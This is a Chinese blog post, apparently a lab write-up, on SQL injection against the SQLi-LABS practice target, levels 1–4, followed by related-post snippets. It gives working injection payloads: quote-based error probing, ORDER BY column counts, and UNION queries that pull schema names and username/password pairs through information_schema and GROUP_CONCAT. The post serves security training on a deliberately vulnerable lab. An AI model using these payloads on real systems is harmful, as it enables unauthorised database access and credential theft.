sql注入练习-SQLi-LABS-1

最新推荐文章于 2024-10-27 19:23:29 发布
原创 最新推荐文章于 2024-10-27 19:23:29 发布 · 1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#SQL注入 #靶场 #SQLi-LABS #联合查询注入 #Error based

本文介绍了SQLi-LABS靶场中Less1-Less4的SQL注入练习,涉及报错型和联合查询注入技术。通过试错、布尔型注入、ORDER BY字段数检测、UNION查询及函数利用,逐步揭示数据库信息。练习中展示了如何获取库名、表名、用户数据等。Less2-Less4则分别展示了不同类型的注入方法。

sql注入练习-1

摘要

本篇是针对SQLi-LABS靶场的Less1-Less4的SQL注入练习。
主要涉及报错型注入、联合查询注入。

练习

第1~4关是都是Error-based,只不过方式不一样,可能是通过单引号/双引号等进行试错。
以第一关为例:
Less-1
输入参数获取用户名密码
在这里插入图片描述
如何通过SQL注入,获得库,表,用户数据等信息?

试错

首先来试错,通过试错猜测SQL语句。

  1. 通过单引号来试错

参数使用:?id=1’,通过一下报错信息可以推测出大概的sql:
select xxx from db.table where id = 'xx' limit 0, 1;
其中xx是我们输入的部分
在这里插入图片描述
依据上述我们可以尝试构造以下sql:通过布尔型注入来探测信息

select xxx from db.table where id = 'xx' or 1 = 1 -- 'limit 0, 1;

那么输入应该是:’ or 1 = 1 –

测试一下:

%20是空格。

得到以下结果,与输入id=1的结果是一样的,猜测可能sql获取到结果后取了第一条数据。
在这里插入图片描述
让我们换一种方式:

  1. 通过order by n测试有多少个字段

order by n 可以用来检测查询的字段数,n为使用第n个查询参数进行排序,从1开始

先看看sql查询了多少字段:构造以下sql

select xxx from db.table where id = '' order by 5 -- 'limit 0, 1

输入?id=’ order by 5 --%20

结果:
order by
说明没有5个字段,逐渐递减尝试,测试结果n为3.

  1. 联合查询注入

通过union后面的查询,展示自己想要的信息,所以前面的查询需要没有返回结果

构造如下sql

select xxx from db.table where id = '-1' union select user(), database(), version() -- 'limit 0, 1
联合查询注入
可以看到登录名和密码对应的结果是database()和version(),即第二个和第三个参数。通过这种方式可以推断出当前数据库是security,当前登录用户是root@localhost(调整user()函数位置)

  1. 利用GROUP_CONCAT函数库名,表名等进行嵌套查询

构造如下sql:

SELECT * from user WHERE id = '-1' union select 1, (SELECT GROUP_CONCAT(DISTINCT(TABLE_NAME)) FROM information_schema.TABLES WHERE TABLE_SCHEMA = "security" ), VERSION() -- ' limit 0, 1

在这里插入图片描述
到这里可以猜测,查询的是security.users表

查看表结构:

select xx from security.users where id = '-1' union select 1, (select GROUP_CONCAT(COLUMN_NAME) from information_schema.COLUMNS WHERE TABLE_SCHEMA = "security" AND table_name = 'users' ), version() -- ' limit 0, 1

在这里插入图片描述
查询表中数据:

select xx from security.users where id = '-1' union select 1, (select GROUP_CONCAT(username, '@', password) from users), version() -- ' limit 0, 1

在这里插入图片描述
到这里想要的数据基本都拿到了。Less2~Less4的方法基本相同,只不过是更换’为"或使用数值等方式。
Less2是数值型注入,不使用单双引号;
Less3是单引号 + ) ,即SQL可能是id in ()的格式
Less4是双引号 + )实现

总结

  1. 当错误信息会回显时,可以利用报错型注入来通过错误信息推测SQL
  2. 通过构造布尔注入实现特定查询条件
  3. 利用单双引号等来构造闭合条件
  4. 通过order by来测试查询字段数
  5. 通过union构造联合查询,获取有用信息
  6. 利用**user(),database(),group_concat()**等函数

参考:

搭建sql注入靶场

更多学习:
Web 安全攻防之道
安全攻防技能

SQL漏洞注入(附实战练习
Matheus的博客
05-15 6324
环境部署 phpstudy、DVWA、SQLI-LABS(学习sql注入平台)、upload-labs、课程源码环境web SQL注入原理 SQL 注入就是指 web 应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的 参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql 语句来 实现对数据库的任意操作。 举例说明: id=id=id=_GET[‘id’] sql=SELECT∗FROMusersWHEREid=sql=SELECT * FROM users WHERE
sql注入的专项练习 sqlilabs(含代码审计)
2401_82388450的博客
07-21 1082
在做题之前先复习了数据库的增删改查,然后自己用本地的环境,在自己建的库里面进行了sql语句的测试,主要是回顾了一下sql注入联合注入查询的语句和sql注入的一般做题步骤。1.获取当前数据库2.获取数据库中的表3.获取表中的字段名。
sql注入练习工具
11-08
sql注入小工具 测试sql注入 安全类 仅供 学习参考使用
ElasticSearch
Blanklr的博客
10-13 637
ElasticSearch 是非关系型数据库 官网: www.elastic.co,是基于Lucene的搜索服务器 关系型数据库查询的弊端 : 性能低、功能弱 ES是弥补这一缺点而诞生的 1.性能低 模糊查询 一条条的遍历 2.功能弱 存储的都是字符串 不能在商品信息字段中 查询出 含有华为或手机的 倒排索引 将各个文档中的内容进行分词、形成词条。然后记录词条和数据的唯一标识的对应关系,形成的产物。是一个散列图 存储原理 1.在index索引库中 生成数据表,即把所有的文档都进行分词
SQL注入练习--sqli-labs
qq_46263951的博客
02-12 3051
前言 SQL注入是比较常见的漏洞,有数据库的地方就可能存在SQL注入,所以学好SQL注入是非常有必要的,sqli-labs是一个不错的练习靶场。推荐一篇文章SQL注入之Mysql注入姿势及绕过总结 前置知识 注入流程 判断是否存在注入注入是字符型还是数字型,闭合情况,绕过方式 ?id=1' ?id=1" ?id=1') ?id=1") ?id=1' or 1# ?id=1' or 0# ?id=1' or 1=1# ?id=1' and 1=2# ?id=1' and sleep(5)# ?id=
精选资源
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
通过sqli-labs-php7.zip,用户可以搭建一个模拟的SQL注入环境,从而在不危害真实系统的前提下,进行各种SQL注入攻击和防御的练习。 搭建sqli-labs靶场的过程相对简单。首先,用户需要准备一个包含Apache、MySQL和...
网络安全专题----sql注入sqli-Labs 靶场保姆级教程
qq_41567696的博客
07-28 1693
SQLi-Labs是一款用于学习和练习SQL注入漏洞的开源应用程序。它提供了一系列的漏洞场景和练习环境,帮助用户了解和实践SQL注入漏洞的利用技术。SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入字段中注入恶意的SQL代码,从而绕过应用程序的身份验证、访问敏感数据、修改数据库内容等。通过使用SQLi-Labs,用户可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
信安必备靶场-sqli-labs-master-用于练习sql注入各种注入类型
08-12
sqli-labs-master是一个SQL注入SQL Injection,简称Sqli)实战靶场的资源。这个靶场通常用于安全培训、渗透测试和学习Web应用程序安全方面的人员,它提供了一系列的模拟环境和挑战,目的是让用户通过实际操作来...
SQL注入练习靶场搭建sqli-labs(详细图文教程小白也能学会)
最新发布
2301_80241182的博客
10-27 2005
9.我们找到WWW目录下sqli-labs-master\sql-connections中的db-creds.inc这个文件。1.下载好安装包后,我们先打开我们的小皮软件(phpstudy_pro)然后启动下面图片上的这两个就行。8.然后我们打开浏览器访问127.0.0.1/sqli-labs-master(如下图)3.然后会跳转到我们的WWW目录,把我们下载好的压缩包放到WWW目录(如下图)5.如果你双击打开这个文件夹里面是这种我们就选中这文件右击剪切。2.点击小皮上的网站-管理-打开根目录。
[SQL注入练习]K8-ASP渗透环境[K8team].rar
05-08
[SQL注入练习]K8-ASP渗透环境[K8team].rar
本地网站 练习sql注入使用 新手必备
11-13
本地网站 用于练习sql注入使用 新手必备 本地网站 用于练习sql注入使用 新手必备
SQL注入练习
qq_49422880的博客
07-31 895
[GYCTF2020]Ezsqli 这道题输入几个数字之后,我就感觉就是要用盲注暴力破解。所以就看看报错的内容是什么,进行异或注入即可。 输入1的时候显示 输入2的时侯显示 输到三的时候 Error Occured When Fetch Result. 输到十的时候 Error Occured When Fetch Result. 随便输入字符 bool(false) 嘿嘿,基本确定是要跑脚本暴力破解。 先做fuzz测试,看看过滤掉哪些关键词 handler INFORMATION,还有很多… 1.开
sql注入练习
wcy19990628的博客
01-07 339
DVWA训练基础 low级别 1.参照上文确定当前库 1' union select (select database()),2 -- - 2.确定库后,爆表 1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

future_1024

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值